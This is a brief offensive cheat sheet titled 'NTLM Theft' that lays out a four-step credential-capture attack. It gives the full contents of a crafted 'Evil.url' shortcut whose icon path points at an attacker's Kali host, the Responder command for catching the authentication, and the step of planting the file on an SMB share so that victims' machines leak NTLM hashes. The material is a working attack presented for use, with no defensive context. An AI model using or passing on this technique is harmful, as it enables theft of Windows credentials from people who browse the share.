NTLM Theft

1

Create a file called "Evil.url"

[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\<Kali IP Address>\%USERNAME%.icon
IconIndex=1

2

Start Responder

sudo responder -I <Interface Name> -wv

3

Put Evil.url on SMB share

put Evil.url

4

Stolen NTLM appeared on Responder